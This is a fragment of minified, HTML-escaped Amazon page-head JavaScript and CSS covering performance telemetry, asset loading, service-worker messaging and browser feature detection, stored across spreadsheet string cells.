co_:f.connectStart,_co:f.connectEnd,sc_:f.secureConnectionStart,rq_:f.requestStart,rs_:f.responseStart,_rs:f.responseEnd,dl_:f.domLoading,di_:f.domInteractive,de_:f.domContentLoadedEventStart,_de:f.domContentLoadedEventEnd,_dc:f.domComplete,ld_:f.loadEventStart,_ld:f.loadEventEnd,ntd:("function"!==typeof C.now||u(M)?0:new E(M+C.now())-new E)+a.t0}),x&amp;&amp;B(a.t,{ty:x.type+a.t0,rc:x.redirectCount+a.t0}),U=1);a.isBFonMshop||B(a.t,{hob:d.ue_hob,hoe:d.ue_hoe});a.ifr&amp;&amp;(g+="&amp;ifr=1")}y(k,b,c,q);var r,n;l||b&amp;&amp;
b!==s||ca(b);(c=d.ue_mbl)&amp;&amp;c.cnt&amp;&amp;!l&amp;&amp;(g+=c.cnt());l?e("wb",b,2):"ld"==k&amp;&amp;(a.lid=H(s));for(r in a.sc)if(1==e("wb",r))break;if(l){if(a.s)return;g=p(g,null)}else c=p(g,null),c!=g&amp;&amp;(c=A(c),a.b=c),z&amp;&amp;(g+=z),g=p(g,b||a.id);g=A(g);if(a.b||l)for(r in a.sc)2==e("wb",r)&amp;&amp;delete a.sc[r];z=0;a._rt&amp;&amp;(g+="&amp;rt="+a._rt());c=h.csa;if(!l&amp;&amp;c)for(n in r=e("t",b)||{},c=c("PageTiming"),r)r[v](n)&amp;&amp;c("mark",da[n]||n,r[n]);l||(a.s=0,(n=d.ue_err)&amp;&amp;0&lt;n.ec&amp;&amp;n.pec&lt;n.ec&amp;&amp;(n.pec=n.ec,g+="&amp;ec="+n.ec+"&amp;ecf="+n.ecf),z=e("ctb",b),
"ld"!==k||b||a.markers?a.markers&amp;&amp;a.isl&amp;&amp;!l&amp;&amp;b&amp;&amp;B(a.markers,e("t",b)):(a.markers={},B(a.markers,e("t",b))),e("t",b,{}));a.tag&amp;&amp;a.tag().length&amp;&amp;(g+="&amp;csmtags="+a.tag().join("|"),a.tag=P());n=a.viz||[];(r=n.length)&amp;&amp;(g+="&amp;viz="+n.splice(0,r).join("|"));u(d.ue_pty)||(g+="&amp;pty="+d.ue_pty+"&amp;spty="+d.ue_spty+"&amp;pti="+d.ue_pti);a.tabid&amp;&amp;(g+="&amp;tid="+a.tabid);a.aftb&amp;&amp;(g+="&amp;aftb=1");!a._ui||b&amp;&amp;b!=s||(g+=a._ui());a.a=g;m(g,k,z,l,b&amp;&amp;"string"===typeof b&amp;&amp;-1!==b.indexOf("csa:"))}}function ca(a){var b=h.ue_csm_markers||
{},c;for(c in b)b[v](c)&amp;&amp;y(c,a,F,b[c])}function A(a,b,c){c=c||h;if(c[V])c[V](a,b,!1);else if(c[W])c[W]("on"+a,b)}function T(a,b,c){c=c||h;if(c[X])c[X](a,b,!1);else if(c[Y])c[Y]("on"+a,b)}function Z(){function a(){d.onUl()}function b(a){return function(){c[a]||(c[a]=1,S(a))}}var c={},e,f;d.onLd=b("ld");d.onLdEnd=b("ld");d.onUl=b("ul");e={stop:b("os")};h.chrome?(A(G,a),L.push(a)):e[G]=d.onUl;for(f in e)e[v](f)&amp;&amp;R(0,h,f,e[f]);d.ue_viz&amp;&amp;ue_viz();A("load",d.onLd);y("ue")}function ba(e,b,c){var f=d.ue_mbl,
p=h.csa,m=p&amp;&amp;p("SPA"),p=p&amp;&amp;p("PageTiming");f&amp;&amp;f.ajax&amp;&amp;f.ajax(b,c);m&amp;&amp;p&amp;&amp;(m("newPage",{requestId:e,transitionType:"soft"}),p("mark","transitionStart",b));a.tag("ajax-transition")}d.ueinit=(d.ueinit||0)+1;var a=d.ue=d.ue||{};a.t0=h.aPageStart||d.ue_t0;a.id=d.ue_id;a.url=d.ue_url;a.rid=d.ue_id;a.a="";a.b="";a.h={};a.s=1;a.t={};a.sc={};a.iel=[];a.ielf=[];a.viz=[];a.v="0.246390.0";a.paused=!1;var v="hasOwnProperty",G="beforeunload",K="on"+G,V="addEventListener",X="removeEventListener",W="attachEvent",
Y="detachEvent",da={cf:"criticalFeature",af:"aboveTheFold",fn:"functional",fp:"firstPaint",fcp:"firstContentfulPaint",bb:"bodyBegin",be:"bodyEnd",ld:"loaded"},E=h.Date,C=h.performance||h.webkitPerformance,f=(C||{}).timing,x=(C||{}).navigation,M=(f||{}).navigationStart,w=d.ue_fpf,Q=0,U=0,L=[],D=0,F;a.oid=H(a.id);a.lid=H(a.id);a._t0=a.t0;a.tag=P();a.ifr=h.top!==h.self||h.frameElement?1:0;a.markers=null;a.attach=A;a.detach=T;if("000-0000000-8675309"===d.ue_sid){var $=I("cdn-rid"),aa=I("session-id");
$&amp;&amp;aa&amp;&amp;O($,aa,"cdn")}d.uei=Z;d.ueh=R;d.ues=e;d.uet=y;d.uex=S;a.reset=O;a.pause=function(d){a.paused=d};Z()})(ue_csm,ue_csm.window,ue_csm.document);
ue.stub(ue,"event");ue.stub(ue,"onSushiUnload");ue.stub(ue,"onSushiFlush");
ue.stub(ue,"log");ue.stub(ue,"onunload");ue.stub(ue,"onflush");
(function(b){var a=b.ue,g=1===b.ue_no_counters;a.cv={};a.cv.scopes={};a.cv.buffer=[];a.count=function(b,f,c){var e={},d=a.cv,h=c&amp;&amp;0===c.c;e.counter=b;e.value=f;e.t=a.d();c&amp;&amp;c.scope&amp;&amp;(d=a.cv.scopes[c.scope]=a.cv.scopes[c.scope]||{},e.scope=c.scope);if(void 0===f)return d[b];d[b]=f;d=0;c&amp;&amp;c.bf&amp;&amp;(d=1);g||(ue_csm.ue_sclog||!a.clog||0!==d||h?a.log&amp;&amp;a.log(e,"csmcount",{c:1,bf:d}):a.clog(e,"csmcount",{bf:d}));a.cv.buffer.push({c:b,v:f})};a.count("baselineCounter2",1);a&amp;&amp;a.event&amp;&amp;(a.event({requestId:b.ue_id||
"rid",server:b.ue_sn||"sn",obfuscatedMarketplaceId:b.ue_mid||"mid"},"csm","csm.CSMBaselineEvent.4"),a.count("nexusBaselineCounter",1,{bf:1}))})(ue_csm);
var ue_hoe = +new Date();
}
window.ueinit = window.ue_ihb;
&lt;/script&gt;
&lt;!-- 11uud --&gt;
&lt;script&gt;window.ue &amp;&amp; ue.count &amp;&amp; ue.count('CSMLibrarySize', 9805)&lt;/script&gt;
&lt;!-- sp:end-feature:csm:head-open-part2 --&gt;
&lt;!-- sp:feature:aui-assets --&gt;
&lt;link rel="stylesheet" href="https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC|01ZTHTZObnL.css,410yLeQZHKL.css,31OSFXVtM5L.css,013z33uKh2L.css,017DsKjNQJL.css,0131vqwP5UL.css,41EWOOlBJ9L.css,11TIuySqr6L.css,01ElnPiDxWL.css,11fJbvhE5HL.css,01Dm5eKVxwL.css,01IdKcBuAdL.css,01y-XAlI+2L.css,21P6CS3L9LL.css,01oDR3IULNL.css,41Axm2+z87L.css,01XPHJk60-L.css,01S0vRENeAL.css,21IbH+SoKSL.css,11MrAKjcAKL.css,21fecG8pUzL.css,11a5wZbuKrL.css,01CFUgsA-YL.css,31pHA2U5D9L.css,11qour3ND0L.css,116t+WD27UL.css,11gKCCKQV+L.css,11061HxnEvL.css,11oHt2HYxnL.css,01j2JE3j7aL.css,11JQtnL-6eL.css,21KA2rMsZML.css,11jtXRmppwL.css,0114z6bAEoL.css,21uwtfqr5aL.css,11QyqG8yiqL.css,11K24eOJg4L.css,11F2+OBzLyL.css,01890+Vwk8L.css,01g+cOYAZgL.css,01cbS3UK11L.css,21F85am0yFL.css,01giMEP+djL.css_.css?AUIClients/AmazonUI&amp;VGEEt8I0#us.not-trident.388250-T1.432724-T1.577951-T1.577971-T1.577969-T1.632675-T1.577970-T1" /&gt;
&lt;script&gt;
(function(d,k,Q,F){function v(a){x&amp;&amp;x.tag&amp;&amp;x.tag(l(":","aui",a))}function n(a,b){x&amp;&amp;x.count&amp;&amp;x.count("aui:"+a,0===b?0:b||(x.count("aui:"+a)||0)+1)}function p(a){try{return a.test(navigator.userAgent)}catch(b){return!1}}function t(a){return"function"===typeof a}function y(a,b,e){a.addEventListener?a.addEventListener(b,e,!1):a.attachEvent&amp;&amp;a.attachEvent("on"+b,e)}function l(a,b,e,d){b=b&amp;&amp;e?b+a+e:b||e;return d?l(a,b,d):b}function G(a,b,e){try{Object.defineProperty(a,b,{value:e,writable:!1})}catch(w){a[b]=
e}return e}function ta(a,b,e){var d=e=a.length,f=function(){d--||(R.push(b),S||(setTimeout(da,0),S=!0))};for(f();e--;)ea[a[e]]?f():(A[a[e]]=A[a[e]]||[]).push(f)}function ua(a,b,e,d,f){var c=k.createElement(a?"script":"link");y(c,"error",d);f&amp;&amp;y(c,"load",f);a?(c.type="text/javascript",c.async=!0,e&amp;&amp;/AUIClients|images[/]I/.test(b)&amp;&amp;c.setAttribute("crossorigin","anonymous"),c.src=b):(c.rel="stylesheet",c.href=b);k.getElementsByTagName("head")[0].appendChild(c)}function fa(a,b){return function(e,w){function f(){ua(b,
e,c,function(b){T?n("resource_unload"):c?(c=!1,n("resource_retry"),f()):(n("resource_error"),a.log("Asset failed to load: "+e));b&amp;&amp;b.stopPropagation?b.stopPropagation():d.event&amp;&amp;(d.event.cancelBubble=!0)},w)}if(ha[e])return!1;ha[e]=!0;n("resource_count");var c=!0;return!f()}}function va(a,b,e){for(var d={name:a,guard:function(c){return b.guardFatal(a,c)},guardTime:</t>
  </si>
  <si>
    <t>function(a){return b.guardTime(a)},logError:function(c,e,d){b.logError(c,e,d,a)}},f=[],c=0;c&lt;e.length;c++)H.hasOwnProperty(e[c])&amp;&amp;(f[c]=
U.hasOwnProperty(e[c])?U[e[c]](H[e[c]],d):H[e[c]]);return f}function B(a,b,e,w,f){return function(c,k){function n(){var a=null;w?a=k:t(k)&amp;&amp;(V.start=z(),a=k.apply(d,va(c,g,h)),V.end=z());if(b){H[c]=a;a=c;for(ea[a]=!0;(A[a]||[]).length;)A[a].shift()();delete A[a]}V.done=!0}var g=f||this;t(c)&amp;&amp;(k=c,c=F);b&amp;&amp;(c=c?c.replace(ia,""):"__NONAME__",W.hasOwnProperty(c)&amp;&amp;g.error(l(", reregistered by ",l(" by ",c+" already registered",W[c]),g.attribution),c),W[c]=g.attribution);for(var h=[],C=0;C&lt;a.length;C++)h[C]=
a[C].replace(ia,"");var V=D[c||"anon"+ ++wa]={depend:h,registered:z(),namespace:g.namespace};c&amp;&amp;xa.hasOwnProperty(c);e?n():ta(h,g.guardFatal(c,n),c);return{decorate:function(a){U[c]=g.guardFatal(c,a)}}}}function ja(a){return function(){var b=Array.prototype.slice.call(arguments);return{execute:B(b,!1,a,!1,this),register:B(b,!0,a,!1,this)}}}function X(a,b){return function(e,d){d||(d=e,e=F);var f=this.attribution;return function(){q.push(b||{attribution:f,name:e,logLevel:a});var c=d.apply(this,arguments);
q.pop();return c}}}function I(a,b){this.load={js:fa(this,!0),css:fa(this)};G(this,"namespace",b);G(this,"attribution",a)}function ka(){k.body?r.trigger("a-bodyBegin"):setTimeout(ka,20)}function E(a,b){a.className=Y(a,b)+" "+b}function Y(a,b){return(" "+a.className+" ").split(" "+b+" ").join(" ").replace(/^ | $/g,"")}function la(a){try{return a()}catch(b){return!1}}function J(){if(K){var a={w:d.innerWidth||g.clientWidth,h:d.innerHeight||g.clientHeight};5&lt;Math.abs(a.w-Z.w)||50&lt;a.h-Z.h?(Z=a,L=4,(a=h.mobile||
h.tablet?450&lt;a.w&amp;&amp;a.w&gt;a.h:1250&lt;=a.w)?E(g,"a-ws"):g.className=Y(g,"a-ws")):0&lt;L&amp;&amp;(L--,ma=setTimeout(J,16))}}function ya(a){(K=a===F?!K:!!a)&amp;&amp;J()}function za(){return K}"use strict";var M=Q.now=Q.now||function(){return+new Q},z=function(a){return a&amp;&amp;a.now?a.now.bind(a):M}(d.performance),N=z(),xa={},u=d.AmazonUIPageJS||d.P;if(u&amp;&amp;u.when&amp;&amp;u.register){N=[];for(var m=k.currentScript;m;m=m.parentElement)m.id&amp;&amp;N.push(m.id);return u.log("A copy of P has already been loaded on this page. ","FATAL",N.join(" "))</t>
  </si>
  <si>
    <t>}var x=
d.ue;v();v("aui_build_date:3.23.1-2023-04-06");var R=[],Aa=[],S=!1;var da=function(){for(var a=setTimeout(da,0),b=M();Aa.length||R.length;)if(R.shift()(),50&lt;M()-b)return;clearTimeout(a);S=!1};var ea={},A={},ha={},T=!1;y(d,"beforeunload",function(){T=!0;setTimeout(function(){T=!1},1E4)});var ia=/^prv:/,W={},H={},U={},D={},wa=0,aa=String.fromCharCode(92),q=[],na=!0,oa=d.onerror;d.onerror=function(a,b,e,w,f){f&amp;&amp;"object"===typeof f||(f=Error(a,b,e),f.columnNumber=w,f.stack=b||e||w?l(aa,f.message,"at "+
l(":",b,e,w)):F);var c=q.pop()||{};f.attribution=l(":",f.attribution||c.attribution,c.name);f.logLevel=c.logLevel;f.attribution&amp;&amp;console&amp;&amp;console.log&amp;&amp;console.log([f.logLevel||"ERROR",a,"thrown by",f.attribution].join(" "));q=[];oa&amp;&amp;(c=[].slice.call(arguments),c[4]=f,oa.apply(d,c))};I.prototype={logError:function(a,b,e,w){b={message:b,logLevel:e||"ERROR",attribution:l(":",this.attribution,w)};if(d.ueLogError)return d.ueLogError(a||b,a?b:null),!0;console&amp;&amp;console.error&amp;&amp;(console.log(b),console.error(a));
return!1},error:function(a,b,e,d){a=Error(l(":",d,a,e));a.attribution=l(":",this.attribution,b);throw a;},guardError:X(),guardFatal:X("FATAL"),guardCurrent:function(a){var b=q[q.length-1];return b?X(b.logLevel,b).call(this,a):a},guardTime:function(a){var b=q[q.length-1],e=b&amp;&amp;b.name;return e&amp;&amp;e in D?function(){var b=z(),d=a.apply(this,arguments);D[e].async=(D[e].async||0)+z()-b;return d}:a},log:function(a,b,d){return this.logError(null,a,b,d)},declare:B([],!0,!0,!0),register:B([],!0),execute:B([]),
AUI_BUILD_DATE:"3.23.1-2023-04-06",when:ja(),now:ja(!0),trigger:function(a,b,e){var k=M();this.declare(a,{data:b,pageElapsedTime:k-(d.aPageStart||NaN),triggerTime:k});e&amp;&amp;e.instrument&amp;&amp;O.when("prv:a-logTrigger").execute(function(b){b(a)})},handleTriggers:function(){this.log("handleTriggers deprecated")},attributeErrors:function(a){return new I(a)},_namespace:function(a,b){return new I(a,b)},setPriority:function(a){na?na=!1:this.log("setPriority only accept the first call. ")}};var r=G(d,"AmazonUIPageJS",
new I);var O</t>
  </si>
  <si>
    <t>Worker},autofocus: function(){return"autofocus"in k.createElement("input")},inputPlaceholder:function(){return"placeholder"in k.createElement("input")},textareaPlaceholder:function(){return"placeholder"in
k.createElement("textarea")},localStorage:function(){return"localStorage"in d&amp;&amp;null!==d.localStorage},orientation:function(){return"orientation"in d},touch:function(){return"ontouchend"in k},gradients:function(){return ba.testGradients()},hires:function(){var a=d.devicePixelRatio&amp;&amp;1.5&lt;=d.devicePixelRatio||d.matchMedia&amp;&amp;d.matchMedia("(min-resolution:144dpi)").matches;n("hiRes"+(qa?"Mobile":ra?"Tablet":"Desktop"),a?1:0);return a},transform3d:function(){return ba.testTransform3d()},touchScrolling:function(){return p(/Windowshop|android|OS ([5-9]|[1-9][0-9]+)(_[0-9]{1,2})+ like Mac OS X|SOFTWARE=([5-9]|[1-9][0-9]+)(.[0-9]{1,2})+.*DEVICE=iPhone|Chrome|Silk|Firefox|Trident.+?; Touch/i)},
ios:function(){return p(/OS [1-9][0-9]*(_[0-9]*)+ like Mac OS X/i)&amp;&amp;!p(/trident|Edge/i)},android:function(){return p(/android.([1-9]|[L-Z])/i)&amp;&amp;!p(/trident|Edge/i)},mobile:function(){return qa},tablet:function(){return ra},rtl:function(){return"rtl"===g.dir}};for(m in h)h.hasOwnProperty(m)&amp;&amp;(h[m]=la(h[m]));for(var ca="textShadow textStroke boxShadow borderRadius borderImage opacity transform transition".split(" "),P=0;P&lt;ca.length;P++)h[ca[P]]=la(function(){return ba.test(ca[P])});var K=!0,ma=0,Z=
{w:0,h:0},L=4;J();y(d,"resize",function(){clearTimeout(ma);L=4;J()});var sa={getItem:function(a){try{return d.localStorage.getItem(a)}catch(b){}},setItem:</t>
  </si>
  <si>
    <t>function(a,b){try{return d.localStorage.setItem(a,b)}catch(e){}}};g.className=Y(g,"a-no-js");E(g,"a-js");!p(/OS [1-8](_[0-9]*)+ like Mac OS X/i)||d.navigator.standalone||p(/safari/i)||E(g,"a-ember");u=[];for(m in h)h.hasOwnProperty(m)&amp;&amp;h[m]&amp;&amp;u.push("a-"+m.replace(/([A-Z])/g,function(a){return"-"+a.toLowerCase()}));E(g,u.join(" "));g.setAttribute("data-aui-build-date",
"3.23.1-2023-04-06");r.register("p-detect",function(){return{capabilities:h,localStorage:h.localStorage&amp;&amp;sa,toggleResponsiveGrid:ya,responsiveGridEnabled:za}});p(/UCBrowser/i)||h.localStorage&amp;&amp;E(g,sa.getItem("a-font-class"));r.declare("a-event-revised-handling",!1);r.execute("RetailPageServiceWorker",function(){function a(a,b){c.controller&amp;&amp;a?(a={feature:"retail_service_worker_messaging",command:a},b&amp;&amp;(a.data=b),c.controller.postMessage(a)):a&amp;&amp;n("sw:sw_message_no_ctrl",1)}function b(a){var b=a.data;
if(b&amp;&amp;"retail_service_worker_messaging"===b.feature&amp;&amp;b.command&amp;&amp;b.data){var c=b.data;a=d.ue;var e=d.ueLogError;switch(b.command){case "log_counter":a&amp;&amp;t(a.count)&amp;&amp;c.name&amp;&amp;a.count(c.name,0===c.value?0:c.value||1);break;case "log_tag":a&amp;&amp;t(a.tag)&amp;&amp;c.tag&amp;&amp;(a.tag(c.tag),b=d.uex,a.isl&amp;&amp;t(b)&amp;&amp;b("at"));break;case "log_error":e&amp;&amp;t(e)&amp;&amp;c.message&amp;&amp;e({message:c.message,logLevel:c.level||"ERROR",attribution:c.attribution||"RetailServiceWorker"});break;case "log_weblab_trigger":if(!c.weblab||!c.treatment)break;
a&amp;&amp;t(a.trigger)?a.trigger(c.weblab,c.treatment):(n("sw:wt:miss"),n("sw:wt:miss:"+c.weblab+":"+c.treatment));break;default:n("sw:unsupported_message_command",1)}}}function e(a,b){try{c.getRegistrations().then(function(c){c.forEach(function(c){c.unregister().then(function(){n(a+"success")}).catch(function(c){r.logError(c,"[AUI SW] Failed to "+b+" service worker: ","ERROR","RetailPageServiceWorker");n(a+"failure")})})})}catch(Ba){v("sw:api_error")}}function g(){h.forEach(function(a){v(a)})}function f(a,
b,c){if(b){a=p(/Chrome/i)&amp;&amp;!p(/Edge/i)&amp;&amp;!p(/OPR/i)&amp;&amp;!a.capabilities.isAmazonApp&amp;&amp;!p(new RegExp(aa+"bwv"+aa+"b"));var d="sw:browser:"+c+":";b.browser&amp;&amp;a&amp;&amp;(h.push(d+"supported"),b.browser.action(d,c));!a&amp;&amp;b.browser&amp;&amp;h.push(d+"unsupported")}}try{var c=navigator.serviceWorker}catch(C){v("sw:nav_err")}(function(){if(c){var e=function(){a("page_loaded",{rid:d.ue_id,mid:d.ue_mid,pty:d.ue_pty,sid:d.ue_sid,spty:d.ue_spty,furl:d.ue_furl})};y(c,"message",b);a("client_messaging_ready");r.when("load").execute(e);
y(c,"controllerchange",function(){a("client_messaging_ready");"complete"===k.readyState&amp;&amp;e()})}})();var h=[],m=function(a,b){var c=d.uex,e=d.uet;a=l(":","aui","sw",a);"ld"===b&amp;&amp;t(c)?c("ld",a,{wb:1}):t(e)&amp;&amp;e(b,a,{wb:1})},u=function(a,b,e){function f(a){b&amp;&amp;t(b.failure)&amp;&amp;b.failure(a)}function k(){p=setTimeout(function(){v(l(":","sw:"+h,g.TIMED_OUT));f({ok:!1,statusCode:g.TIMED_OUT,done:!1});m(h,"ld")},e||4E3)}var g={NO_CONTROLLER:"no_ctrl",TIMED_OUT:"timed_out",UNSUPPORTED_BROWSER:"unsupported_browser",
UNEXPECTED_RESPONSE:"unexpected_response"},h=l(":",a.feature,a.command),p,q=!0;if("MessageChannel"in d&amp;&amp;c&amp;&amp;"controller"in c)if(c.controller){var r=new MessageChannel;r.port1.onmessage=function(c){(c=c.data)&amp;&amp;c.feature===a.feature&amp;&amp;c.command===a.command?(q&amp;&amp;(m(h,"cf"),q=!1),m(h,"af"),clearTimeout(p),c.done||k(),c.ok?b&amp;&amp;t(b.success)&amp;&amp;b.success(c):f(c),c.done&amp;&amp;m(h,"ld")):n(l(":","sw:"+h,g.UNEXPECTED_RESPONSE),1)};k();m(h,"bb");c.controller.postMessage(a,[r.port2])}else v(l(":","sw:"+a.feature,g.NO_CONTROLLER)),
f({ok:!1,statusCode:g.NO_CONTROLLER,done:!0});else v(l(":","sw:"+a.feature,g.UNSUPPORTED_BROWSER)),f({ok:!1,statusCode:g.UNSUPPORTED_BROWSER,done:!0})};(function(){c?(m("ctrl_changed","bb"),c.addEventListener("controllerchange",function(){v("sw:ctrl_changed");m("ctrl_changed","ld")})):n(l(":","sw: ctrl_changed","sw_unsupp"),1)})();(function(){var a=function(){m(b,"ld");var a=d.uex;u({feature:"page_proxy",command:"request_feature_tags"},{success:function(b){b=b.data;Array.isArray(b)&amp;&amp;b.forEach(function(a){"string"===
typeof a?v(l(":","sw:ppft",a)):n(l(":","sw:ppft","invalid_tag"),1)});n(l(":","sw:ppft","success"),1);x&amp;&amp;x.isl&amp;&amp;t(a)&amp;&amp;a("at")},failure:function(a){n(l(":","sw:</t>
  </si>
  <si>
    <t>ppft","error:"+(a.statusCode||"ppft_error")),1)}})};if("requestIdleCallback"in d){var b=l(":","ppft","callback_ricb");d.requestIdleCallback(a,{timeout:1E3})}else b=l(":","ppft","callback_timeout"),setTimeout(a,0);m(b,"bb")})();var q={reg:{},unreg:{}};q.unreg.mshopBeta={action:e};q.unreg.browser={action:e};(function(a){var b=a.reg,e=a.unreg;c&amp;&amp;
c.getRegistrations?(O.when("A").execute(function(a){f(a,e,"unregister")}),y(d,"load",function(){O.when("A").execute(function(a){f(a,b,"register");g()})})):(b&amp;&amp;b.browser&amp;&amp;h.push("sw:browser:register:unsupported"),e&amp;&amp;e.browser&amp;&amp;h.push("sw:browser:unregister:unsupported"),g())})(q)});r.declare("a-fix-event-off",!1);n("pagejs:pkgExecTime",z()-N)})(window,document,Date);
(function(b){function q(a,e,d){function g(a,b,c){var f=Array(e.length);~l&amp;&amp;(f[l]={});~m&amp;&amp;(f[m]=c);for(c=0;c&lt;n.length;c++){var g=n[c],h=a[c];f[g]=h}for(c=0;c&lt;p.length;c++)g=p[c],h=b[c],f[g]=h;a=d.apply(null,f);return~l?f[l]:a}"string"!==typeof a&amp;&amp;b. P.error("C001");-1===a.indexOf("@")&amp;&amp;-1&lt;a.indexOf("/")&amp;&amp;(-1&lt;a.indexOf("es3")||-1&lt;a.indexOf("evergreen"))&amp;&amp;(a=a.substring(0,a.lastIndexOf("/")));if(!r[a]){r[a]=!0;d||(d=e,e=[]);a=a.split(":",2);var c=a[1]?a[0]:void 0,f=(a[1]||a[0]).replace(/@capability\//,
"@c/"),k=c?b.P._namespace(c):b.</t>
  </si>
  <si>
    <t>P,t=!f.lastIndexOf("@c/",0),u=!f.lastIndexOf("@m/",0),n=[];a=[];var p=[],v=[],m=-1,l=-1;for(c=0;c&lt;e.length;c++){var h=e[c];"module"===h&amp;&amp;k.error("C002");"exports"===h?l=c:"require"===h?m=c:h.lastIndexOf("@p/",0)?h.lastIndexOf("@c/",0)&amp;&amp;h.lastIndexOf("@m/",0)?(n.push(c),a.push("mix:"+h)):(p.push(c),v.push(h)):(n.push(c),a.push(h.substr(3)))}k.when.apply(k,a).register("mix:"+f,function(){var a=[].slice.call(arguments);return t||u||~m||p.length?{capabilities:v,cardModuleFactory:function(b,
c){b=g(a,b,c);b. P=k;return b},require:~m?q:void 0}:g(a,[],function(){})});(t||u)&amp;&amp;k.when("mix:@amzn/mix.client-runtime","mix:"+f).execute(function(a,b){a.registerCapabilityModule(f,b)});k.when("mix:"+f).register("xcp:"+f,function(a){return a});var q=function(a,b,c){try{var e=-1&lt;f.indexOf("/")?f.split("/")[0]:f,d=a[0],g=d.lastIndexOf("./",0)?d:e+"/"+d.substr(2),h=g.lastIndexOf("@p/",0)?"mix:"+g:g.substr(3);k.when(h).execute(function(a){try{b(a)}catch(x){c(x)}})}catch(w){c(w)}}}}"use strict";var r=
{};b.mix_d||((b. Promise?P:P.when("3p-promise")).register("@p/promise-is-ready",function(a){b.</t>
  </si>
  <si>
    <t>Promise=b.Promise||a}),(Array.prototype.includes?P:P.when("a-polyfill")).register("@p/polyfill-is-ready",function(){}),b.mix_d=function(a,b,d){P.when("@p/promise-is-ready","@p/polyfill-is-ready").execute("@p/mix-d-deps",function(){q(a,b,d)})},b.xcp_d=b.mix_d,P.when("mix:@amzn/mix.client-runtime").execute(function(a){P.declare("xcp:@xcp/runtime",a)}));b.mixTimeout||(b.mixTimeout=function(a,e,d){b.mixCardInitTimeouts||
(b.mixCardInitTimeouts={});b.mixCardInitTimeouts[e]&amp;&amp;clearTimeout(b.mixCardInitTimeouts[e]);b.mixCardInitTimeouts[e]=setTimeout(function(){P.log("Client-side initialization timeout","WARN",a)},d)});b.mix_csa_map=b.mix_csa_map||{};b.mix_csa_internal=b.mix_csa_internal||function(a,e,d){return b.mix_csa_map[e]=b.mix_csa_map[e]||b.csa(a,d)};b.mix_csa_internal_key=b.mix_csa_internal_key||function(a,b){for(var d="",e=0;e&lt;b.length;e++){var c=b[e];void 0!==a[c]&amp;&amp;"object"!==typeof a[c]&amp;&amp;(d+=c+":"+a[c]+",")}if(!d)throw Error("bad mix-csa key gen.");
return d};b.mix_csa_event=b.mix_csa_event||function(a){try{var e=b.mix_csa_internal_key(a,["producerId"])}catch(d){return P.logError(d,"MIX C005","WARN",void 0),function(){}}try{return b.mix_csa_internal("Events",e,a)}catch(d){return P.logError(d,"MIX C004","WARN",e),function(){}}};b.mix_csa=b.mix_csa||function(a,e){try{e=e||"";var d=document.querySelectorAll(a);if(1&lt;d.length)for(var g=0;g&lt;d.length;g++){if(d[g].querySelector(e)){var c=d[g];break}}else 1===d.length&amp;&amp;(c=d[0]);if(!c)throw Error(" ");
return b.mix_csa_internal("Content",a,{element:c})}catch(f){return P.logError(f,"MIX</t>
  </si>
  <si>
    <t>C004","WARN",a),function(){}}}})(window);
(window.AmazonUIPageJS ? AmazonUIPageJS : P).when('sp.load.js').execute(function() {
  (window.AmazonUIPageJS ? AmazonUIPageJS : P).load.js('https://m.media-amazon.com/images/I/61ZS63EQSsL.js?AUIClients/AmazonUIjQuery');
  (window.AmazonUIPageJS ?</t>
  </si>
  <si>
    <t>AmazonUIPageJS : P).load.js('https://m.media-amazon.com/images/I/11Y+5x+kkTL._RC|51Am7NcREVL.js,11yKORv-GTL.js,11GgN1+C7hL.js,01+z+uIeJ-L.js,01VRMV3FBdL.js,21SDJtBU-PL.js,012FVc3131L.js,11rRjDLdAVL.js,516j7qaWchL.js,11kWu3cNjYL.js,11wr1I7-WYL.js,11OREnu1epL.js,11Wm6BwZ+6L.js,21ssiLNIZvL.js,0190vxtlzcL.js,51+N26vFcBL.js,01JYHc2oIlL.js,31nfKXylf6L.js,01ezj5Rkz1L.js,11bEz2VIYrL.js,31o2NGTXThL.js,01rpauTep4L.js,01XC3MnuvfL.js_.js?AUIClients/AmazonUI&amp;MFdCk5El#567364-T1.432724-T1.577970-T1');
  (window.AmazonUIPageJS ? AmazonUIPageJS : P).load.js('https://m.media-amazon.com/images/I/51EIwpasq4L.js?AUIClients/CardJsRuntimeBuzzCopyBuild');
});
&lt;/script&gt;
&lt;!-- sp:end-feature:aui-assets --&gt;
&lt;!--</t>
  </si>
  <si>
    <t>sp:feature:nav-inline-css --&gt;
&lt;!-- NAVYAAN CSS --&gt;
&lt;style type="text/css"&gt;
.nav-sprite-v1 .nav-sprite, .nav-sprite-v1 .nav-icon {
  background-image: url(https://m.media-amazon.com/images/G/01/gno/sprites/nav-sprite-global-1x-hm-dsk-reorg._CB405937547_.png);
  background-position: 0 1000px;
  background-repeat: repeat-x;
}
.nav-spinner {
  background-image: url(https://m.media-amazon.com/images/G/01/javascripts/lib/popover/images/snake._CB485935611_.gif);
  background-position: center center;
  background-repeat: no-repeat;
}
.nav-timeline-icon, .nav-access-image, .nav-timeline-prime-icon {
  background-image: url(https://m.media-amazon.com/images/G/01/gno/sprites/timeline_sprite_1x._CB485945973_.png);
  background-repeat: no-repeat;
}
&lt;/style&gt;
&lt;link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/41H4XraWzVL._RC|71HWFfRdLgL.css,41VtAmDG4YL.css,11OsNOdrK6L.css,31IK8nB9EAL.css,31YZpDCYJPL.css,21MKjoYL8wL.css,41yQj5y2obL.css,01yCq3WXEcL.css,110Nj+wUGYL.css,31OvHRW+XiL.css,01R53xsjpjL.css,11iUHDm4--L.css,415g7iDx4VL.css,01YWmXMYw8L.css_.css?AUIClients/NavDesktopUberAsset&amp;ISdZUqcQ#desktop.488657-T1.427118-T3.269915-T2" /&gt;
&lt;!-- sp:end-feature:nav-inline-css --&gt;
&lt;!-- sp:feature:host-assets --&gt;
&lt;link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/41vuCeQs8eL.css?AUIClients/CSHelpCoreCSS" /&gt;
&lt;link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/31aksb5JX9L.css?AUIClients/CSHelpV4CSS" /&gt;
&lt;link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/01LUlxh28+L.css?AUIClients/CSHelpVideoPlayerCSS" /&gt;
&lt;script&gt;
  (window.AmazonUIPageJS ?</t>
  </si>
  <si>
    <t>AmazonUIPageJS : P).load.js('https://images-na.ssl-images-amazon.com/images/I/11buRsHn39L.js?AUIClients/CSHelpContextJSBuzzWrapper');
